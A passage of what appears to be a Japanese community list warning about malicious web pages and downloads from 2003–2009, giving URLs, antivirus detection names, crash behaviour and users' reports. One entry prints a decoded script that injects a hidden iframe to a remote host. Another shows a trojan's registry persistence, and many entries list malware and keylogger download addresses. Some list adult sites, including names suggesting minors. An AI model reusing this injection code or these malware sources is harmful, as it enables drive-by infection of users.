    [2008/10/19]ウィルス名:TROJ_DIALER.DH


  146. http://www.affiliazione1.com/download/af259.exe
    [2008/10/19]ウィルス名:TROJ_CJ.A


  147. http://www.affiliazione1.com/download/af260.exe
    [2008/10/19]ウィルス名:DIAL_ADIALER.GC


  148. http://www.affiliazione1.com/download/af261.exe
  149. http://www.affiliazione1.com/download/af262.exe
  150. http://www.affiliazione1.com/download/af263.exe
    [2008/10/19]ウィルス名:TROJ_DIALER.ZL


  151. http://www.affiliazione1.com/download/af321.exe
    [2007/01/12]2006/12/31 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、ウィルス名:DIAL_TREEHALL.A として検出するよう対応、とのこと。
    実際に 2006/12/31 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:DIAL_TREEHALL.A を検出することを確認。
    2006/12/31 から今日まではファイルは置き換えられていないと推測される。


  152. http://www.agostino.biz/index.chm
    [2005/07/02]コンパイル済み HTML ヘルプファイルが落ちてくるが、ウィルス名:CHM_PSYME.AM を検出。


  153. http://www.aimphuck.com/Imbum_bw.cab
    [2006/08/01]ウィルス名:ADW_LOOK2ME.L


  154. http://www.aimphuck.com/Imbum_bw.exe
    [2006/12/01]2006/11/23 にトレンドマイクロ社にファイルを提出。
    2006/11/28 にその結果の連絡があり、ウィルス名:ADW_ADSPY.AA として検出するよう対応、とのこと。
    実際に 2006/11/23 にDLしたファイルと今日改めてDLしたファイルからウィルス名:ADW_ADSPY.AA を検出することを確認。
    2006/11/23 から今日まではファイルは置き換えられていないと推測される。


  155. http://www.aiongamemeca.com/mavideo/
  156. http://www.aiongamemeca.com/mavideo/index.htm
    [2009/01/26]こんな感じ のページだが、ウィルス名:JS_DLOAD.MD+EXPL_ANICMOO.GEN+EXPL_EXECOD.A を検出。
    少し経つと「about:blank」になる。
    また、このサイトは、'Microsoft Corporation'からの'Remote Data Services Data Control'アドオンを実行しようとしている。


  157. http://www.aiongamemeca.com/mavideo/xia.exe
    [2009/01/26]ウィルス名:PAK_GENERIC.001


  158. http://www.akoak.com/mf/1.htm
    [2005/03/06]真っ白なページだがソースを見ると奇怪なことが分かる。しかし、バスター無反応。詳細は不明。


  159. http://www.alaopinionpublica.com.mx/tmp.exe
    [2006/08/13]ウィルス名:WORM_SDBOT.VN


  160. http://www.albinoblacksheep.com/flash/open.html
    [2004/02/09]「You are an idiot!」と高らかに歌い上げるウインドウがデスクトップを動き回り、それを閉じると6つに分裂・増殖する。閉じれば閉じるほどどんどん増えていく。
    [2005/06/16]開いたらトロイの木馬が二種検出されてマカフィーが反応。バスターは無反応。
    アンチドートでウィルス名:Trojan.JS.NoCloseを検出。
    ブラクラを起動するスクリプトに対する反応のようでインターネット一時ファイルの削除後、反応なければ問題なし。
    [2005/08/15]ノートンだとトロイの木馬を検出するらしい。
    [2005/10/27]以下は2chでのレス。
    「updateしてれば無害化となりますが、環境によっては現役有害URLです。当方IEではではブラウザが微妙に左右にブレます。」
    [2005/10/29]「アンチウィルスによってはトロイの木馬の反応ありのブラクラです。アンチドートでは「Trojan.JS.NoClose」で検出されます。バスターは反応ありません。」
    [2005/10/31]ノートンでウィルス名:Trojan Horse を検出するが、IEの一時キャッシュ削除でOK 。
    [2008/10/18]他の方の結果は以下の「」内。
    「You Are an Idiot(あなたは本当に馬鹿です)と言う昔流行ったブラクラFLASH 。
    有名なのは1つのウインドウを閉じると30個開く という悪質なブラクラでしたが、私の環境では このサイトでのポップアップは確認できませんでした。
    補足:Flashの保管庫のようですので、単に見たい人のためのものかと。」


  161. http://www.albinoblacksheep.com/flash/you.html
    [2003/09/21]JAVAで記述されたIEが動き回るブラクラ。Alt+F4 で脱出。
    [2004/05/16]you.htmlは閉じようとすることでyou.jsというJavaScript内のprocreatを呼び出し、6つほど open.html を開く。
    [2006/02/17]改めて確認。以下のURLの @ に飛び、A の声付きフラッシュが流れる。閉じてもブラクラ発動は無し。
    @、//www.albinoblacksheep.com/flash/youare.php
    A、//69.93.111.150/albino_flash16/youare(www.albinoblacksheep.com).swf
    基本的には この画面この画面 を繰り返す。


  162. http://www.albinoblacksheep.com/text/annoying.php
    [2004/10/24]150のアラートメッセージの表示。途中2回、名前と言いたい事?を聞かれる。150まで行った後は作者へのメール画面表示。


  163. http://www.alexa69.com/
    [2005/04/10]ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.M
    別サイトがブラクラ並に開いていき、お気に入りに登録しろ、と連発する。
    そのうちにウィルス名:TROJ_ANICMOO.D や JAVA_BYTEVER.A 、JAVA_BYTEVER.C を断続的に検出。強制終了で脱出。
    [2005/04/20]改めて確認。踏むとウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.M+JAVA_BYTEVER.A-1 を検出。
    ソースを見ると //www.alexa69.com/msupdsrv.exe を実行するよう記述してある。このexeのURL解説を参照。
    また、//www.alexa69.com/には別窓が多数あり、ウィルス名:TROJ_ANICMOO.F を相当数連続で検出する。
    バスターの緊急ロックをオンにするとウィルスは検出されなくなる。
    別窓表示でウィルス名:TROJ_ANICMOO.F をかなり多く検出し、確認に支障をきたすので緊急ロック。それまでに表示された別窓は以下。
    //galview.net/?alexa69.com
    //sweetschoolgirl.com/
    //galview.net/out.php?link=__enter
    //galview.net/out.php?link=_time
    //coolteenpussy.com/?galview.net
    //moreteenporn.com/?galview.net
    //galview.net/out.php?link=__exit
    //www.alexa69.com/out.php
    [2006/01/03]以下は他のかたのレス。
    「とりあえず危険。踏むな。今格闘中。タスク起動しません。脱出試みます。」
    「現在状況 タスク管理が出来ない。なにやら重くてなんにも動かない。バスター起動しない。なんかexeしこまれたっぽい。」
    「電源ボタンで強制終了しましたがデスク(トップ)に21個アイコン増えてます ん〜 相変わらずタスク権限がないですね。システムの復元もどうかな?って感じです。」
    「現在状況 システムの復元が二度目の強制終了後可能となったので即復元、で現在はVB以外のソフトにてスキャン中です。」
    「簡単に結果報告しますね。まず踏んだ瞬間に一瞬だけエロサイト表示され直ぐに消える。(その瞬間にexeが発動)
    英文でダイアログが表示される→閉じる→全ての動作が重くなる→タスク呼ぼうとしても管理権限がない。と表示される→ctrl alt deleteでも再起動できない→どうしようもなくなって強制終了→立ち上げ時にタスクバーに3つ、デスクトップに21個、お気に入りに6個なんやらできている→やはり重い+ツールバーからなにやら英文表示される。それが消えない→システムの復元→再起動できないのでやはり不可→もう一度落とす→立ち上げ時に復元失敗しましたがもう一度やりますか?と表示→ここで即復元でとりあえず復旧→その後一旦バスターさようならでpandaにてスキャン→ウィルス10個→駆除、スパイボットとアドで計29個スパイ発見→削除。
    んでデスクとお気に入りの中のアイコンをゴミ箱へポイ 、後はクッキー等の基本的な削除作業→(゚д゚)ウマーでした。後はpandaさようならバスター君久しぶりとなって復旧しました。」
    [2006/01/03]改めて確認。以前とソースが変更されている。踏むと こんな感じ の海外アダルトサイト。
    その後の症状を大きく分けると、
    1. いきなり「xpl.wmf」ファイルをDLしろ、と言ってくる。この時点でバスターがウィルス名:TROJ_NASCENE.GEN を2つ検出。
    2. 検出後、6〜7秒経つとウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC を検出。
    3. その後、ランダムにアダルトサイトが開く。その開くサイトにより、ブラクラ並に開いていったり、ウィルスを検出したりする。何も無い場合もあった。
    上記解説をもう少し見てみると、まず、1. と 2. 。
    1. と 2. は、ソース内のコード変換された部分から発動している。以下がコード変換された部分である。長いので、適当な箇所で改行してある。
    <script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65
    %28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%38%35%2E
    %32%35%35%2E%31%31%33%2E%32%34%32%2F%61%64%76%2F%31%32%30%2F%6E%65%77%2E
    %70%68%70%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69
    %66%72%61%6D%65%3E%27%29%3B'));</script>

    これを復号化すると以下のようなスクリプトが現れてくる。

    <script>eval(unescape('document.write('
    <iframe src=http://85.255.113.242/adv/120/new.php width=1 height=1></iframe>');'));</script>

    IFRAMEタグで、//85.255.113.242/adv/120/new.php を呼び出しているのが原因。このURLの詳細はURL List解説を参照。

    3. の症状は //www.alexa69.com/cgi-bin/at3/out.cgi を新窓表示しようとしている、ということである。
    この //www.alexa69.com/cgi-bin/at3/out.cgi はランダムに色々なサイトに飛ばす仕掛けがしてあり、その多くは //www.alexa69.com/ を踏んだ時とほぼ同じ症状である。
    以下の 4. から 12. が飛び先である。この //www.alexa69.com/cgi-bin/at3/out.cgi により、最悪の場合、上記の //www.alexa69.com/ の症状が再び繰り返し、更に繰り返し、という悪循環に陥る。
    1. //www.pornwoods.com/ ← 海外アダルトサイト。バスター無反応で、普通に閉じれる。以前はウィルス反応があったサイト。
    2. //www.worldsex.co.yu/ ← 海外アダルトサイト。ウィルス名:TROJ_NASCENE.GEN+JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC 。放っておくと色々なアダルトサイトが次々と開いていき、その中に脱出困難なサイトがある。
    3. //www.pornhit.net/ ← 海外アダルトサイト。ウィルス名:TROJ_NASCENE.GEN+JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC 。放っておくと色々なアダルトサイトが次々と開いていき、その中に脱出困難なサイトがある。
    4. //www.amazon4sex.com/ ← 海外アダルトサイト。ウィルス名:TROJ_NASCENE.GEN+JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC 。放っておくと色々なアダルトサイトが次々と開いていき、その中に脱出困難なサイトがある。
    5. //www.wsexi.com/ ← 「ページを表示できません」となる。
    6. //lolitas-teens.com/?alexa69.com ← 海外アダルトサイトらしいが、表示される画像がリンク切れらしい。閉じると//lolitas-teens.com/read.php?link=pictureを表示しようとするが、「ページを表示できません」となる。
    7. //www.easypic.org/ ← 海外アダルトサイト。ウィルス名:TROJ_NASCENE.GEN+JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC 。放っておくと色々なアダルトサイトが次々と開いていき、その中に脱出困難なサイトがある。
    8. //www.placeforporno.com/ ← 海外アダルトサイト。バスター無反応で、普通に閉じれる。
    9. //www.alfasearch.net/ ← 「ALFASEARCH」という検索サイト。適当な言葉を入れて検索してみると、いい加減な結果を表示する。バスター無反応で、普通に閉じれる。
    [2006/01/14]他の方の結果は「MS06-001 WMF Exploitというウイルスを検出(avast!)。」


  164. http://www.alexa69.com/?thumbs/53fc0f.jpg
    [2005/08/04]飛び先は海外アダルトサイトでその時点ではPCに変化は無い。
    ウインドウを閉じた後に開く別ウインドウにウィルスあり。
    これは閉じると//www.alexa69.com/out.phpを起動させることによる。
    [2005/08/08]jpg画像ではなく、海外アダルトサイトだが、リンク先が全て危険サイト。
    [2006/01/03]再確認。//www.alexa69.com/ の[2006/01/03]時の症状と同じ現象を確認。詳細は //www.alexa69.com/ の[2006/01/03]時を参照。
    [2006/01/08]他の方の結果は以下の「」内。
    「俺の場合ノートンがセキュリティホール突くwmfファイルを検出してFAXビューワが開いてそれで終わりだった。FAXビューワには何も表示されんかった。」
    [2006/01/08]「HTTP MS Windows WMF Code Exec を検出。」
    [2006/01/18]「VB2006反応。「TROJ_ANICMOO.X」を大量に検出。」
    [2006/02/07]「Kaspersky 反応あり。Trojan-Downloader.JS.Agent.i 検出。」


  165. http://www.alexa69.com/?vaginator.com
    [2005/07/31]ウィルス名:JS_MHTREDIR.AG+JAVA_BYTEVER.A


  166. http://www.alexa69.com/cgi-bin/at3/out.cgi
    [2006/01/03]踏むと以下のどれかに飛ぶ。
    1. //www.pornwoods.com/ ← 海外アダルトサイト。バスター無反応で、普通に閉じれる。以前はウィルス反応があったサイト。
    2. //www.worldsex.co.yu/ ← 海外アダルトサイト。ウィルス名:TROJ_NASCENE.GEN+JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC 。放っておくと色々なアダルトサイトが次々と開いていき、その中に脱出困難なサイトがある。
    3. //www.pornhit.net/ ← 海外アダルトサイト。ウィルス名:TROJ_NASCENE.GEN+JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC 。放っておくと色々なアダルトサイトが次々と開いていき、その中に脱出困難なサイトがある。
    4. //www.amazon4sex.com/ ← 海外アダルトサイト。ウィルス名:TROJ_NASCENE.GEN+JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC 。放っておくと色々なアダルトサイトが次々と開いていき、その中に脱出困難なサイトがある。
    5. //www.wsexi.com/ ← 「ページを表示できません」となる。
    6. //lolitas-teens.com/?alexa69.com ← 海外アダルトサイトらしいが、表示される画像がリンク切れらしい。閉じると //lolitas-teens.com/read.php?link=picture を表示しようとするが、「ページを表示できません」となる。
    7. //www.easypic.org/ ← 海外アダルトサイト。ウィルス名:TROJ_NASCENE.GEN+JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC 。放っておくと色々なアダルトサイトが次々と開いていき、その中に脱出困難なサイトがある。
    8. //www.placeforporno.com/ ← 海外アダルトサイト。バスター無反応で、普通に閉じれる。
    9. //www.alfasearch.net/ ← 「ALFASEARCH」という検索サイト。適当な言葉を入れて検索してみると、いい加減な結果を表示する。バスター無反応で、普通に閉じれる。


  167. http://www.alexa69.com/msupdsrv.exe
    [2005/04/20]バスター無反応だが、以下のアンチウィルスソフトでウィルスを検出。
    BitDefender → ウィルス名:BehavesLike:Trojan.StartPage
    ClamAV → ウィルス名:Trojan.Porn-Bookmark-2
    Kaspersky Anti-Virus → ウィルス名:Trojan.Win32.StartPage.qe
    NOD32 → ウィルス名:probably unknown NewHeur_PE
    VBA32 → ウィルス名:Trojan.Win32.StartPage.qe
    また、Norman Virus Controlでは以下のような結果が出た。
    Sandbox: W32/Malware; [ General information ]
    * File length: 3584 bytes.
    [ Changes to filesystem ]
    * Creates file C:\WINDOWS\Sex for Everyone.url.
    * Creates file C:\WINDOWS\Hit on your Porn for FREE.url.
    * Creates file C:\WINDOWS\Find Your Porn on Pornwoods.url.
    * Creates file C:\WINDOWS\The Easy Pic on the NET.url.
    * Creates file C:\WINDOWS\See Our Big Porn Collection.url.
    * Creates file C:\WINDOWS\Hunting for SEX.url.
    * Creates file C:\WINDOWS\Find always a Porn-News.url.
    * Creates file C:\WINDOWS\WetHotGirl.url.
    [ Changes to registry ]
    * Modifies value "Start Page"="http://www.alexa69.com/" in key "HKCU\Software\Microsoft\Internet Explorer\Main".
    * Creates value "MSUpdSrv"="msupdsrv.exe" in key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run".
    [ Process/window information ]
    * Will automatically restart after boot (I'll be back...).


  168. http://www.alicelove.com/
    [2006/01/08]他の方の結果は以下の「」内。
    「洋エロサイトが大窓で開き、閉じると洋サーチサイトが開きます。洋サーチサイトが開いた瞬間から Kaspersky 反応あり。Trojan-Downloader.JS.Agent.i などを検出。」


  169. http://www.alloticket.com/MicroPaiement/kit/WebInstall.dll
    [2007/05/20]2006/12/17 にトレンドマイクロ社にファイルを提出。
    2007/01/23 にその結果の連絡があり、ウィルス名:TROJ_SMALL.ABE として検出するよう対応、とのこと。
    しかし、実際には当該URLからはウィルス名:Adware_Edipole が検出される。


  170. http://www.allteenmodel.com/
    [2007/04/25]海外アダルトサイトだが、ウィルス名:EXPL_ANICMOO.GEN+EXPL_WMF.GEN を検出。


  171. http://www.allteenmodel.com/out.php
    [2005/03/14]このURLを踏むとランダムに別のアダルトサイトに飛ぶ。10回ほど確認。飛び先の詳細は以下。飛び先はまだ他にもありそう。
    1. //www.myrealpics.com/ に飛び、ウィルス名:ADW_RBLAST.E+JAVA_BYTEVER.A を検出。
      この飛び先を閉じると //sweetschoolgirl.com/ を新窓表示する。
    2. //sweetschoolgirl.com/ に飛び、ウィルス名:ADW_RBLAST.E+JAVA_BYTEVER.Aを 検出。
      この飛び先を閉じると //www.allteenmodel.com/ を新窓表示、ウィルス名:JAVA_BYTEVER.A を検出。
    3. //www.teen2003.com/ に飛び、ウィルス名:JAVA_BYTEVER.A-1 を検出。
    4. //www.picsdrive.com/ に飛び、ウィルス名:ADW_RBLAST.E+JAVA_BYTEVER.A を検出。
      この飛び先を閉じると //allteenmodel.com/?picsdrive.com を新窓表示、ウィルス名:JAVA_BYTEVER.A を検出。
    5. //www.takebest.com/ に飛び、ウィルス名:ADW_RBLAST.E+JAVA_BYTEVER.A を検出。
      この飛び先を閉じると //sexyyoungpics.com/ を新窓表示、ウィルス名:JAVA_BYTEVER.A を検出。
    6. //www.zonebest.com/ に飛ぶ。ウィルス反応無し。
    7. //galview.net/?allteenmodel.com に飛び、読み込みに時間がかかった上でウィルス名:JAVA_BYTEVER.A を検出。
      この飛び先には別窓が多数ある。症状としてはかなりゆっくりとしたブラクラのようなもので、別窓1枚1枚の情報量が多く、別窓1枚が開いて暫らく読み込んでいると次の別窓が開く。その次の別窓も情報量が多いために暫らく読み込み、暫らくして次の別窓が開く、という感じ。
      以下がその別窓群だがほんの一部。まだあると思われる。
      //allteenmodel.com/?galview.net、 //coolteenpussy.com/?galview.net
      //moreteenporn.com/?galview.net、 //www.sexdu.com/
      //www.sexdu.com/、 //galview.net/out.php?link=_time
      //sexyyoungpics.com/、 //www.allpornhere.com/?from=galview.net
      飛び先の //galview.net/?allteenmodel.com を閉じると //thesexpics.com/?galview.net に飛ぶ。
    8. //www.myrealpics.com/ に飛び、ウィルス名:ADW_RBLAST.E+JAVA_BYTEVER.A を検出。
      この飛び先を閉じると //www.myrealpics.com/cgi-bin/zcj/z.cgi?link=XXXFRESH を新窓表示、「ページを表示できません」となる。
    9. //www.sweet4all.com/に飛び、ウィルス名:ADW_RBLAST.E+JAVA_BYTEVER.Aを検出。
      この飛び先を閉じると //sweetschoolgirl.com/ を新窓表示、ウィルス名:JAVA_BYTEVER.A を検出。
    10. //www.zonebest.com/ に飛ぶ。ウィルス反応無し。普通に閉じれる。


  172. http://www.allyoursearch.com/allyoursearch.cab
    [2005/04/17]ウィルス名:TROJ_RBLAST.DLDR


  173. http://www.allyoursearch.com/Allyoursearch2.cab
    [2005/04/17]ウィルス名:TROJ_LOWZONES.AD


  174. http://www.alt-f4.cz/exploder/crash.html
    [2004/08/30] embedタグで意味不明な文字羅列を呼び出しPCをフリーズさせ、さらにobjectタグで「crash.html」と「crash2.html」を三回ほど呼び出す。
    ループしてるから尚、性質が悪い。ソースを見るとなにかプラグインを呼び出して実行している様子。
    HDDアタックのスクリプトも入ってるので環境により有害。
    [2005/09/02]CPU使用率が高いままIEが固まる。タスクより強制的に終了して脱出。


  175. http://www.altnet.com/install/adm4.cab
    [2006/10/15]ウィルス名:ADW_ALTNET.B+ADW_ALTNET.C


  176. http://www.altnet.com/install/asmfiles.cab
    [2006/10/15]ウィルス名:ADW_TOPSEARCH.A+ADW_ALTNET.C


  177. http://www.altnet.com/install/dman4.cab
    [2006/08/31]DL+解凍すると以下の6つのファイルが現れる。
    2006/08/22 にトレンドマイクロ社にこれら6つのファイルを提出。
    今日、その連絡があり、以下のような結果となり、A、B、D、E はウィルスとして対応したとのこと。
    @、bdedata2.dll → 単体では不正な活動を行わないファイル
    A、bdedownloader.dll → ウィルス名:ADW_BDE.D
    B、bdefdi.dll → ウィルス名:ADW_BDE.D
    C、BDEInstallProgress4.dll → 単体では不正な活動を行わないファイル
    D、dman4.dll → ウィルス名:ADW_ALTNET.D
    E、dman4.exe → ウィルス名:ADW_ALTNET.D
    2006/08/22 にDLした「dman4.cab」ファイル中、 A、B、D、E の各ファイルからウィルスを検出。
    また、今日改めて当該URLからDLしてみても各ウィルスを検出。


  178. http://www.altotrabajosverticales.com/images/ie7.0.exe
    [2008/11/26]ウィルス名:TROJ_SMALL.EBN


  179. http://www.altotrabajosverticales.com/visor/juntas/update.exe
    [2008/09/14]ウィルス名:TSC_GENCLEAN+TROJ_RENOS.ADX


  180. http://www.alwaysfreealways.com/
    [2005/12/10]スパイウェア配布サイト。こんな感じ のサイト。このページ表示まで無害で、普通に閉じれる。
    画面にある「SpywareRemover」「WindowsCleaner」「PasswordSaver」の「Download FREE ! 」は それぞれのexeをDL出来る。
    以下の名前とexeURLの解説を参照。
    「SpywareRemover」→ //www.alwaysfreealways.com/installers/spywareremover.exe
    「WindowsCleaner」→ //www.alwaysfreealways.com/installers/windowscleaner.exe
    「PasswordSaver」→ //www.alwaysfreealways.com/installers/passwordsaver.exe


  181. http://www.alwaysfreealways.com/installers/passwordsaver.exe
    [2005/12/10]バスター無反応だが、以下のアンチウィルスソフトで反応。スパイウェアの一種:アドウェアに属するものと思われる。
    AntiVir → Trojan/Dldr.Mavit.3
    BitDefender → Dropped:Trojan.Registrator.B
    Dr.Web → Trojan.StartPage.748, Trojan.Click.439
    Fortinet → W32/Small.ALY-dldr
    Kaspersky Anti-Virus → Trojan.Win32.Registrator.b, Trojan-Downloader.Win32.Small.aly


  182. http://www.alwaysfreealways.com/installers/spywareremover.exe
    [2005/12/10]バスター無反応だが、以下のアンチウィルスソフトで反応。スパイウェアの一種:アドウェアに属するものと思われる。
    BitDefender → Dropped:Trojan.Registrator.B
    Dr.Web → Trojan.StartPage.748, Trojan.Click.439
    Fortinet → W32/Small.ALY-dldr
    Kaspersky Anti-Virus → Trojan.Win32.Registrator.b, Trojan-Downloader.Win32.Small.aly
    NOD32 → Win32/Registrator.B
    VBA32 → Trojan.Win32.Registrator.b


  183. http://www.alwaysfreealways.com/installers/windowscleaner.exe
    [2005/12/10]バスター無反応だが、以下のアンチウィルスソフトで反応。スパイウェアの一種:アドウェアに属するものと思われる。
    AntiVir → Trojan/Dldr.Mavit.3
    BitDefender → Dropped:Trojan.Registrator.B
    Dr.Web → Trojan.StartPage.748, Trojan.Click.439
    Fortinet → W32/Small.ALY-dldr
    Kaspersky Anti-Virus → Trojan.Win32.Registrator.b, Trojan-Downloader.Win32.Small.aly


  184. http://www.alwaysupdatednews.com/install/aun_0036.exe
    [2005/08/15]ウィルス名:TROJ_DLOADER.KM


  185. http://www.alxup.com/adsnt/adsnt.exe
    [2009/04/15]ファイルサイズ:12.4 KB 。ウィルス名:TROJ_PACKED.GEH


  186. http://www.alxup.com/bin/AutoUp.exe
    [2009/04/15]ファイルサイズ:9.77 KB 。ウィルス名:TROJ_AGENT.YGT


  187. http://www.amateur-girls.sexwww.info/
    [2005/03/31]踏むと このセキュリティ警告 が2回。
    その後、ウィルス名:JS_MHTREDIR.F+JAVA_BYTEVER.A+JAVA_BYTEVER.C+JS_EXCEPTION.GEN を検出。
    検出後、この小窓 を表示。「OK」を選ぶと再び、セキュリティ警告を表示。「キャンセル」を選ぶと何もなし。


  188. http://www.amateurs.com.au.pn/
  189. http://www.amateurs.com.au.pn/?archives/2005/02/index4.jpg
    [2005/07/20]海外アダルトサイトだが、ブラクラ並に次々と色々なアダルトサイトが開いていく。
    ウィルス名:TROJ_ANICMOO.G+JAVA_BYTEVER.A [ ウィルスバスター ]
    ウィルス名:Bloodhound.Exploit.6+Bloodhound.Exploit.21 [ ノートン ]
    ウィルス名:JS/TrojanClicker.Linker.NB [ NOD ]
    [2005/10/27]再確認。ページが消されているらしい。


  190. http://www.amazon4sex.com/
    [2005/04/10]ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.M
    別サイトがブラクラ並に開いていく。強制終了で脱出。
    [2006/01/03]再確認。海外アダルトサイト。ウィルス名:TROJ_NASCENE.GEN+JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC
    放っておくと色々なアダルトサイトが次々と開いていき、その中に脱出困難なサイトがある。


  191. http://www.amazon4sex.com/?cgi-bin/tm3/1111352660.jpg
  192. http://www.amazon4sex.com/?cgi-bin/tm3/1111352661.jpg
  193. http://www.amazon4sex.com/?cgi-bin/tm3/1111352662.jpg
  194. http://www.amazon4sex.com/?cgi-bin/tm3/1111352663.jpg
  195. http://www.amazon4sex.com/?cgi-bin/tm3/1111352664.jpg
  196. http://www.amazon4sex.com/?cgi-bin/tm3/1111352665.jpg
  197. http://www.amazon4sex.com/?cgi-bin/tm3/1111352666.jpg
  198. http://www.amazon4sex.com/?cgi-bin/tm3/1111352667.jpg
  199. http://www.amazon4sex.com/?cgi-bin/tm3/1111352668.jpg
  200. http://www.amazon4sex.com/?cgi-bin/tm3/1111352669.jpg
    [2005/08/04]ウィルス名:JS_MHTREDIR.AG [ ウィルスバスター ]
    ウィルス名:Trojan-Clicker.JS.Linker.c [ アンチドート ]
    [2005/10/24]ウィルス名:HTML_REDIR.AI+JAVA_BYTEVER.A


  201. http://www.amecisco.com/ik97v12s.exe
    [2005/11/17]ウィルス名:SPYW_IK.A


  202. http://www.amecisco.com/iks2k21d.exe
    [2007/04/21]ウィルス名:PE_GENERIC


  203. http://www.amecisco.com/iksnt10d.exe
    [2007/04/21]ウィルス名:SPYW_IKSNT.10


  204. http://www.amecisco.com/iksv12d.exe
    [2007/04/21]ウィルス名:SPYW_IKS98.120


  205. http://www.amecisco.com/stealthmail.zip
    [2007/04/21]ウィルス名:DDOS_GENERIC


  206. http://www.amediasoftware.com/download/vaxsetup.589.exe
    [2006/12/25]2006/12/07 にトレンドマイクロ社にファイルを提出。
    2006/12/19 にその結果の連絡があり、ウィルス名:TROJ_ZLOB.BMZ として検出するよう対応、とのこと。
    実際に 2006/12/07 にDLしたファイルと、2006/12/19 にDLしたファイルからウィルス名:TROJ_ZLOB.BMZ を検出することを確認。
    2006/12/07 から 2006/12/19 までのファイルの置き換えは無いと推測されるが、今日改めて当該URLを確認してみると、ファイルは消されていた。


  207. http://www.amigo.in/hahahahahaha/oppai.html
    [2008/08/04]全画面でアニメ系フラッシュがBGM付きで始まる。
    タスクの強制終了で脱出。
    [2008/08/27]他の方の結果は以下の「」内。
    「気味の悪いフラッシュが全画面で出てきてタスクマネージャからも終了できず、びびってPC強制終了しました。
    少し前にあった予告inに書き込むと犯行予告してしまうという奴と関係してるみたいですよね。
    このURLも踏むとどこかに犯行予告とかしてしまってるんでしょうか?」
    [2008/08/27]「予告inがクロスサイトスクリプティング攻撃を受けた際に使用されたブラクラサイト。
    死ね死ね団の曲とともに、血まみれの女が窓ガラスにへばりつく映像が延々と繰り返されます。
    さらに、現在は対策されているらしいが、VIPに爆破予告スレを立てるスクリプトが仕込まれています。」


  208. http://www.anal-vids.com/
    [2005/10/02]海外アダルトサイト。
    ウィルス名:TROJ_ANICMOO.A+JS_PSYME.AF+JAVA_BYTEVER.A+JAVA_BYTEVER.K+JAVA_BYTEVER.S
    別窓が3つあるが、タスクバーのみに常駐する。この別窓は普通に閉じれる。
    ソースを見ると以下のURLを呼び出しているが、この呼び出しているURLがウィルス発動の原因。
    //web-free-hosting.net/inout.php?wm=alextor


  209. http://www.analgirls.biz/cgi-bin/ttt/ttt-out?trade=thumbstower.com
    [2005/12/29]//24-7-search.com/poc/sp4.html に飛ぶので、そちらのURL List解説を参照。


  210. http://www.angel-pics.com/ga02/5_jpg
    [2004/08/13]ノートンではウィルス名:Backdoor.Nibu.D。バスター2004では無反応。


  211. http://www.angelfire.com/anime4/pandadog/Enter/PandaDog.htm
    [2004/12/29] spybot反応:Avenue A,Inc.「パンダ犬」の画像がいくつか置いてある。
    別窓で //www.xzoomy.com/media4/pc042/creative/sophia.html を表示。


  212. http://www.angelfire.com/art/rapunzellonghair/rapunzellonghairarchive/news.htm
    [2004/08/26]踏むと2つのポプアプが開き、変な検索エンジンに飛ばされ、環境によりIE検索が変更される。
    [2004/12/29]普通の海外サイトの1ページだがspybot反応:Avenue A,Inc. 別窓でこの JPG画像 を参照、これを表示。


  213. http://www.angelfire.com/art2/blazer/hm.html
    [2005/02/15]FDDアタック。Alt+F4で親ウインドウを殺せば停止可能。


  214. http://www.angelfire.com/bc3/jmakaya144/
    [2004/04/05] グロ画像→死神のAA→ブラクラ。ページを飛ばされまくった挙句、mailtoストーム。
    エロ同人誌がおいてあるサイトだが、すぐにグロ画像&ブラクラに飛ばされる。
    [2004/04/12]ぼーっとしているとブラクラに転送される。踏んだらすぐに「うp品生き残り」をクリックすればOK。
    [2004/06/03] いまか屋144@2ch半角かな板・同人スレ」というタイトルのページ。
    顔の前部分が全部剥ぎ取られた男性の画像が映し出され、その後にブラクラが発動。
    [2005/03/11]404を確認。


  215. http://www.angelfire.com/bc3/jmakaya144/index1.html
    [2004/06/13]//www.angelfire.com/bc3/jmakaya144/index2.html に飛ぶ。
    [2005/03/11]404を確認。


  216. http://www.angelfire.com/bc3/jmakaya144/index2.html
    [2004/06/13]死神AAのmailtoストーム。mailto画面が349枚でる。Ctrl+Alt+Del で強制終了。
    [2004/06/20]「こっちだよ」と言っている死神のページに飛んでブラクラ発動。conconクラッシャーの可能性。
    [2005/03/11]404を確認。


  217. http://www.angelfire.com/folk/paix/dar.html
    [2005/03/16]ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.C
    ダークロリータ系とほぼ同一ソース。
    [2005/03/20]404を確認。


  218. http://www.angelfire.com/folk/paix/data/0032.html
    [2005/03/13]//213.159.117.133/dl/ms.php に飛ぶ。


  219. http://www.angelfire.com/hiphop2/rupantitle/r3/R3_temp.swfinputStr=2EF53A187E
    [2004/06/23]mailtoストーム。


  220. http://www.angelfire.com/ok2/matrix/crasher.html
    [2006/02/05]踏むとウィンドウ画面が激しく点滅する。
    具体的には、点滅は「白と黒の点滅」で、白は こんな画面 になり、瞬時に黒の こんな画面に になる。これを高速で繰り返す。
    このURLでは、普通に閉じれず、タスクの強制終了で脱出する。
    Kasperskyで、not-virus:BadJoke.JS.Blinker を検出するらしい。
    [2006/03/13]他の方の結果は以下の「」内。
